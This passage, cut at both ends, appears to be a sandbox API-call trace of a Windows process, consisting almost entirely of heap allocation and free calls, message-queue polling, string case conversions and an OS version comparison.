lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.952] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.952] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.952] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.953] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.953] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0196.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.953] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.953] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0196.953] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.953] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.953] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.953] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.953] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.953] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.953] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0196.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0196.953] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.953] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.953] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.954] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.954] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.954] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.954] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0196.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0196.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.958] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.959] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.959] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.960] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.961] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.961] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.961] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.962] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, 